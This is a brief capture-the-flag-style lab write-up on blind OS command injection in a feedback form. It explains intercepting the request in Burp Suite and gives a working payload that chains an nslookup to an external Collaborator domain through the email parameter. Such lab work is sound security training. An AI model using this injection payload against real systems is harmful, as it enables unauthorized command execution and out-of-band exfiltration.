LAB 4 - Blind OS command injection with out-of-band interaction

Initial instructions

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

To come across with this lab first of all we need to send feedback and intercept this request via BurpSuite.

Once intercepted we can try to inject again in the email parameter but in this case performing a nslookup.

email=test%40test.com||nslookup+w0x37th0w8kqs78syqkbskpgh7nybozd.oastify.com||

If we go to our collaborator from BurpSuite we can see the following.

Congratulations, you solved the lab!